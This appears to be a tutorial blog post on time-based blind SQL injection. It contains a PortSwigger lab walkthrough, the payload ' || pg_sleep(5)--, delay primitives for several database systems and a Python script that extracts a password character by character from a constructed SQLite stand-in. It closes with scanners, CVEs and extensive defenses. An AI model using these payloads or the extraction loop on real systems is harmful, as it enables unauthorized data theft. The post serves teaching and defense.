22 Feb 2024

Blind SQL injection with time delays

Blind SQL injection with time delays is an inferential exploitation technique. The application's SQL query is injectable, but the attacker cannot see the query's result or any error it raises; the only observable signal is how long the response takes. The attacker therefore injects a conditional delay: a query fragment that makes the database pause for a chosen number of seconds only if some condition is true (for example, "the first character of the administrator's password is greater than 'm'"). A delayed response means the condition held; a prompt one means it did not. Asking enough such yes/no questions recovers information about the database structure, such as table names and column names, and eventually the stored data itself.

Each request tests one condition, so extracting data means sending many requests. The delay comes from a DBMS-specific primitive: SLEEP() in MySQL, pg_sleep() in PostgreSQL, WAITFOR DELAY in Microsoft SQL Server, or a deliberately slow call such as dbms_pipe.receive_message() in Oracle, wrapped in a CASE or IF so that it runs only when the tested condition is true. The attacker builds up the result character by character, usually narrowing each character with a binary search over its character code so that roughly one bit of information is learned per request.

Because it depends on neither error messages nor data in the response body, time-based blind injection leaves fewer obvious traces than error-based or UNION-based injection, and it is the technique that still works when those fail. The cost is speed and volume: every bit learned takes at least one request, every true answer costs a full delay, and network jitter forces longer delays or repeated measurements. The resulting burst of near-identical requests with unusually long server-side processing times is itself a pattern that monitoring can pick up.

Exploitation examples

To show how the vulnerability is exploited we will use a lab from PortSwigger's Web Security Academy that contains a blind SQL injection with time delays. The application uses a tracking cookie for analytics and executes an SQL query containing the value of that cookie.

The results of the SQL query are not returned, and the application does not respond differently depending on whether the query returns any rows or raises an error. However, because the query is executed synchronously, before the response is sent, a conditional delay inside the query shows up as a delayed response, and that is the channel used to retrieve information.

To solve this lab, we need to exploit the SQL injection vulnerability to cause a 10-second delay.

Let’s just refresh the page and intercept this request with Burp.

For convenience, I will send this request to Repeater. Let's turn our attention to the cookies, namely the TrackingId parameter, and test our payloads there. I will use PortSwigger's own SQL injection cheat sheet to choose the payload.

Following the cheat sheet, we append the payload ' || pg_sleep(5)-- to the TrackingId value (this form is specific to PostgreSQL: pg_sleep() pauses for the given number of seconds and -- comments out the remainder of the original query). If the response now arrives about five seconds later than the baseline request, the injection is confirmed; replacing 5 with 10 produces the 10-second delay the lab asks for. Two practical notes: a cookie value containing spaces or quotes may need URL encoding in Burp, and an unconditional delay only proves that injection is possible. To extract data, the delay is wrapped in a condition, as in CASE WHEN (condition) THEN pg_sleep(10) ELSE pg_sleep(0) END, so that only a true condition produces the wait.
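The extraction loop described in the introduction (one conditional delay per request, characters recovered one at a time by binary search) applied to the lab's cookie-based injection point, as an added Python example; this is not code from the original article or from PortSwigger. The lab's PostgreSQL application is replaced by a constructed in-memory SQLite stand-in: pg_sleep() becomes a registered sleep() function, the users table with its administrator/s3cret row, the tracking table and the short DELAY value are all assumptions, and unicode()/substr() are SQLite's equivalents of PostgreSQL's ascii()/substring().

```python
import sqlite3
import time

DELAY = 0.05  # seconds; kept short so the demo runs quickly (assumption; the lab uses 10 s)

# Conditional-delay primitives per DBMS, as listed on the PortSwigger cheat sheet.
# CONDITION and the number of seconds are the only moving parts.
DELAY_PRIMITIVES = {
    "PostgreSQL": "SELECT CASE WHEN (CONDITION) THEN pg_sleep(10) ELSE pg_sleep(0) END",
    "MySQL": "SELECT IF(CONDITION, SLEEP(10), 'a')",
    "Microsoft SQL Server": "IF (CONDITION) WAITFOR DELAY '0:0:10'",
    "Oracle": "SELECT CASE WHEN (CONDITION) THEN 'a'||dbms_pipe.receive_message(('a'),10) "
              "ELSE NULL END FROM dual",
}


class VulnerableApp:
    """Constructed stand-in for the lab's analytics endpoint.

    The TrackingId cookie is concatenated straight into the query, the rows are
    never returned and errors are swallowed, so the only signal that leaks is how
    long the request takes. SQLite has no pg_sleep(), so a user-defined function
    named sleep() is registered to play that role.
    """

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.create_function("sleep", 1, time.sleep)  # sleep(seconds) -> NULL
        self.db.execute("CREATE TABLE users(username TEXT, password TEXT)")
        self.db.execute("INSERT INTO users VALUES ('administrator', 's3cret')")  # assumed data
        self.db.execute("CREATE TABLE tracking(id TEXT)")
        self.db.execute("INSERT INTO tracking VALUES ('abc123')")  # one row so WHERE is evaluated

    def handle(self, tracking_id: str) -> int:
        query = f"SELECT id FROM tracking WHERE id = '{tracking_id}'"  # injection point
        try:
            self.db.execute(query).fetchall()  # result is discarded
        except sqlite3.Error:
            pass  # errors are hidden from the client as well
        return 200  # the response looks identical either way


# Expression whose value the attacker wants; assumed table/column names.
TARGET = "(SELECT password FROM users WHERE username = 'administrator')"


def is_true(app: VulnerableApp, condition: str) -> bool:
    """Ask the database one yes/no question and read the answer from the clock.

    The payload closes the original string literal, concatenates a scalar subquery
    that sleeps only when the condition holds (sleep(0) otherwise, so no reliance
    on CASE short-circuiting), and reopens a literal so the query stays valid.
    """
    payload = f"x' || (SELECT sleep(CASE WHEN ({condition}) THEN {DELAY} ELSE 0 END)) || '"
    start = time.monotonic()
    app.handle(payload)
    return time.monotonic() - start >= DELAY / 2


def extract(app: VulnerableApp, expr: str, max_len: int = 32) -> str:
    """Recover the string value of `expr` one character at a time.

    Each character is found by binary search over printable ASCII (7 questions per
    character instead of up to 95), which is what "bit by bit" means in practice.
    """
    length = 0
    while length < max_len and is_true(app, f"length({expr}) > {length}"):
        length += 1
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII range; the true code point is always in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            # unicode()/substr() are SQLite; PostgreSQL would use ascii()/substring()
            if is_true(app, f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    app = VulnerableApp()
    print("administrator password:", extract(app, TARGET))
```

Against a real target the delay should be several seconds, the threshold should be compared with a measured baseline rather than a fixed constant, and each answer is worth repeating once before it is trusted, because a single slow network round trip looks exactly like a true condition.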

Scanners that detect vulnerabilities

  1. SQLMap – An extremely popular open-source tool that automates the detection and exploitation of SQL injection. It has a powerful detection engine and a wide range of switches covering database fingerprinting, data fetching and access to the underlying file system. Time-based blind injection is one of its built-in techniques (selectable with --technique=T, with --time-sec setting the delay), and it repeats measurements to filter out network jitter.

  2. OWASP Zed Attack Proxy (ZAP) – A leading open-source tool that grew out of the Open Web Application Security Project (OWASP). It is designed for people with a wide range of security experience and so suits developers and functional testers who are new to penetration testing.

  3. Acunetix – A fully featured commercial automated web application security scanner that handles HTML5, JavaScript and single-page applications. It can audit complex, authenticated web apps and produces compliance and management reports on a wide range of web and network vulnerabilities.

  4. Netsparker (now sold as Invicti) – This scanner stands out with its Proof-Based Scanning technology. It is a fully automated tool that can identify vulnerabilities in HTML5, JavaScript and other web applications, and it provides a proof of exploit to confirm each identified vulnerability.

  5. Burp Suite – Offered by PortSwigger, a comprehensive solution for web application security testing. In addition to a scanner, it features Intruder, Repeater, Sequencer and more. It is particularly well regarded for its proxy, which lets the analyst review and manipulate traffic between the browser and the target application manually; Repeater's response timing is what we used above.

  6. Nmap with NSE scripts – Nmap is primarily a network discovery and security auditing tool. Its scripting engine includes scripts that probe for web vulnerabilities, among them http-sql-injection, which looks for error-based injection in discovered forms and URLs rather than time-based injection.

  7. Nikto – An open-source web server scanner that checks for thousands of potentially dangerous files, outdated server software and misconfigurations. It is updated frequently and can write output in formats other tools consume, but it is not a SQL injection scanner and will not find time-based blind injection on its own.

  8. WebInspect – A comprehensive dynamic application security testing tool from Micro Focus (now OpenText) that simulates real-world attacks to provide a detailed analysis of complex web applications and services. It offers a broad range of service-level and application-level assessments.

  9. AppScan – Originally IBM's and now HCL AppScan, it covers web and mobile application security, application security program management and regulatory compliance. By scanning web and mobile applications before deployment it identifies security vulnerabilities and generates reports and fix recommendations.

  10. w3af – A web application attack and audit framework. The project's goal is a framework for finding and exploiting web application vulnerabilities that is easy to use and extend. It has both a graphical and a command-line interface.

Average CVSS score for Blind SQL injection with time delays

The Common Vulnerability Scoring System (CVSS) provides a way to capture the principal characteristics of a vulnerability and produce a numerical score reflecting its severity. The numerical score can then be translated into a qualitative representation (such as low, medium, high, and critical) to help organizations properly assess and prioritize their vulnerability management processes.

For Blind SQL Injection with time delays, the severity can vary depending on the specific circumstances of the vulnerability, such as the potential impact on the affected system and the complexity of exploiting the vulnerability. However, Blind SQL Injection vulnerabilities are often rated as high or critical due to the potential for an attacker to illicitly retrieve sensitive data from the database, bypass authentication, or even carry out administrative operations on the database.

While Blind SQL Injection vulnerabilities generally fall into the high severity range (scores typically between 7.0 and 10.0; in CVSS v3.1 terms 7.0 to 8.9 is High and 9.0 to 10.0 is Critical), each vulnerability must be assessed individually. Factors such as the confidentiality, integrity and availability impact, the ease of exploitation and the privileges required will determine the final CVSS score. The time-based nature of the injection does not lower the score: it only slows extraction, and the data an attacker can reach is the same as with any other SQL injection.

CVEs related to Blind SQL injection with time delays

CVE-2021-24295: This vulnerability was found in the Piraeus Bank WooCommerce Payment Gateway plugin for WordPress. It is susceptible to time-based blind SQL Injection via the ‘MerchantReference’ parameter.

CVE-2021-43969: The login.jsp page of Quicklert for Digium 10.0.0 (1043) suffered from blind SQL injection with out-of-band interaction (DNS) and time-based blind SQL injection via the uname parameter.

CVE-2019-9053: CMS Made Simple 2.2.8 had an issue in the News module, where a crafted URL could lead to unauthenticated blind time-based SQL injection via the m1_idlist parameter.

CVE-2023-6921: The PrestaShow Google Integrator (PrestaShop addon) had a Blind SQL Injection vulnerability that allowed for data extraction and modification via command insertion in one of the cookies.

CVE-2022-28111: MyBatis PageHelper contained a time-based blind SQL injection vulnerability via the orderBy parameter.

How to study Blind SQL injection with time delays

Theoretical Understanding

  1. Familiarize yourself with SQL syntax, database structure, and the functions of various SQL statements.

  2. Learn about what SQL Injection is, including its types and how it can be exploited by attackers.

  3. Understand the specific strategies used in Blind SQL Injection, where the results of a SQL query are inferred from the behavior of the application rather than displayed directly.

  4. Study how time delays can be introduced into SQL queries and how these can be used to infer information about the database when direct data retrieval is not possible.

Practical Skills

  1. Create a safe, legal environment for practicing your skills. This could be a local setup with deliberately vulnerable applications such as DVWA (Damn Vulnerable Web Application), or platforms such as Hack The Box or the PortSwigger Web Security Academy that provide legal targets for practice.

  2. Get hands-on experience with tools like SQLMap, which can automate the process of detecting and exploiting SQL injection vulnerabilities, including time-based SQL injection.

  3. Learn to craft SQL injection payloads manually to understand the underlying process. This usually involves using SQL functions that cause delays (e.g., SLEEP, WAITFOR DELAY) conditionally to extract information.

  4. Use an intercepting proxy such as Burp Suite to observe and modify requests and to measure response times; Wireshark helps at the network level but shows little of HTTPS traffic without the session keys.

  5. Familiarize yourself with frameworks like Metasploit that have modules for exploiting SQL injection vulnerabilities.

Advanced Topics

  1. Study how to bypass filters and security measures that might be in place to prevent SQL injection.

  2. Understand security practices that can prevent SQL injection, such as the use of prepared statements, parameterized queries, and ORM frameworks.

  3. Learn how to conduct security audits to identify SQL injection vulnerabilities in applications.

How to protect against Blind SQL injection with time delays

  1. Use prepared statements (parameterized queries). This is the most effective defense: the query text is fixed and user input is bound as data, so it can never become part of the SQL logic. PDO in PHP, PreparedStatement in Java, parameter binding in Python's database drivers and equivalent mechanisms in other languages provide this.

  2. Use stored procedures carefully. A properly written stored procedure treats its parameters as data, but one that builds SQL dynamically from those parameters (for example by concatenating them into a string that it then executes) is just as injectable as application code.

  3. Validate input against an allow-list. If a value should be numeric, reject anything that is not; if a tracking cookie should be a fixed-length alphanumeric token, reject anything else. Validation is defense in depth, not a substitute for parameterization.

  4. If prepared statements are genuinely impossible (for instance for an identifier that cannot be bound), escape with the database driver's own function, such as mysqli_real_escape_string() for MySQL or pg_escape_string() for PostgreSQL. The older mysql_real_escape_string() belongs to the mysql extension removed in PHP 7. Escaping protects only quoted string contexts; numeric and identifier positions still need validation.

  5. A WAF can recognize and block many known time-delay payloads (pg_sleep, SLEEP, WAITFOR DELAY, BENCHMARK), including blind injection attempts, by filtering on patterns and heuristics. It is a pattern filter that encoding and comment tricks can bypass, so treat it as an extra layer rather than as the fix.

  6. Ensure that the database account used by the web application has the least privileges necessary. Restricting it to the tables and operations the application actually needs limits what a successful injection can read or change.

  7. Customize error messages so that they reveal nothing about the database structure. Show generic messages to users and keep detailed logs on the server side for trusted personnel only. Note that this does not stop time-based injection, which never needed error output in the first place.

  8. Keep the database management system (DBMS) and all applications up to date with the latest patches. Many updates close injection flaws in the applications and drivers themselves.

  9. Regularly perform security testing, both static code analysis (SAST), which finds string-built queries in source, and dynamic application testing (DAST), which finds the injection by measuring response times the way an attacker would.

  10. Disable database functionality the application does not need. If the application never needs pg_sleep(), for example, the application's database role can have its EXECUTE privilege on that function revoked. This removes one inference channel only: the injection itself remains, and an attacker can fall back on deliberately expensive queries to produce a measurable delay, so this is hardening, not a fix.

  11. Monitor for unusual database activity: many requests to one endpoint whose processing time clusters at round values (5 or 10 seconds), queries invoking sleep functions in the slow-query log, or a sudden increase in database load, all of which can indicate a time-based injection attempt in progress.

  12. Have an incident response plan in place so that your team knows how to react quickly when a SQL injection is detected.
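The contrast the first three items draw, a query built by string concatenation beside the same lookup with a bound parameter and an allow-list check in front of it, as an added Python example; this is not code from the article. The in-memory SQLite table, the tracking-id format the allow-list accepts and the registered sleep() function standing in for pg_sleep() are assumptions made so the example runs offline.

```python
import re
import sqlite3
import time

# Allow-list for the cookie's expected shape (assumed format: 8 to 32 alphanumerics).
TRACKING_ID_RE = re.compile(r"[A-Za-z0-9]{8,32}")


def setup() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the analytics store.

    sleep() is registered so that an injected delay is observable, as pg_sleep()
    would be on the PostgreSQL target the article describes.
    """
    db = sqlite3.connect(":memory:")
    db.create_function("sleep", 1, time.sleep)
    db.execute("CREATE TABLE tracking(id TEXT)")
    db.execute("INSERT INTO tracking VALUES ('abc12345')")  # assumed data
    return db


def lookup_vulnerable(db: sqlite3.Connection, tracking_id: str) -> int:
    """The flaw: the cookie value becomes part of the SQL text."""
    query = f"SELECT COUNT(*) FROM tracking WHERE id = '{tracking_id}'"
    return db.execute(query).fetchone()[0]


def lookup_parameterized(db: sqlite3.Connection, tracking_id: str) -> int:
    """The fix: the SQL text is constant and the value is bound as data.

    Quotes, '||' and sleep() in the value are compared literally against the
    column; nothing in them is ever parsed as SQL.
    """
    query = "SELECT COUNT(*) FROM tracking WHERE id = ?"
    return db.execute(query, (tracking_id,)).fetchone()[0]


def lookup_safe(db: sqlite3.Connection, tracking_id: str) -> int:
    """Defense in depth: reject malformed values before they reach the database,
    then bind the value. Raises ValueError on anything outside the allow-list."""
    if not TRACKING_ID_RE.fullmatch(tracking_id):
        raise ValueError("malformed tracking id")
    return lookup_parameterized(db, tracking_id)


def timed(fn, *args):
    """Run fn(*args) and return (result, seconds). A rejected value yields result None."""
    start = time.monotonic()
    try:
        result = fn(*args)
    except ValueError:
        result = None
    return result, time.monotonic() - start


LOGIC_PAYLOAD = "x' OR '1'='1"                        # alters the WHERE clause
DELAY_PAYLOAD = "x' || (SELECT sleep(0.2)) || '"     # the time-based probe from the lab


if __name__ == "__main__":
    db = setup()
    for name, fn in [("vulnerable", lookup_vulnerable),
                     ("parameterized", lookup_parameterized),
                     ("validated+parameterized", lookup_safe)]:
        rows, _ = timed(fn, db, LOGIC_PAYLOAD)
        _, secs = timed(fn, db, DELAY_PAYLOAD)
        print(f"{name:24s} rows for logic payload: {rows!s:5s} delay payload took {secs:.2f}s")
```

Only the concatenated version matches a row for the logic payload and pauses for the delay payload; binding alone already makes both payloads inert, and the allow-list additionally refuses them before any query runs, which is the cheap place to log and alert on them.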

Conclusion

In conclusion, Blind SQL Injection with time delays represents a sophisticated security threat that exploits vulnerabilities in web applications’ interaction with databases. This article has underscored the importance of understanding both the theoretical and practical aspects of such attacks to better prepare for and mitigate potential breaches.

We have discussed the nature of Blind SQL Injection, its reliance on a delay induced in the database response, and the importance of detecting such vulnerabilities with specialized scanners. A range of tools was highlighted, including SQLMap, OWASP ZAP, Acunetix and others, each offering its own features for identifying and exploiting SQL injection flaws.

Furthermore, we have covered the means of protection against these attacks: prepared statements, carefully written stored procedures, strict input validation, least privilege for the database account, safe error handling, and Web Application Firewalls as an additional layer. Regular security testing, patching, and an incident response plan round out the best practices.
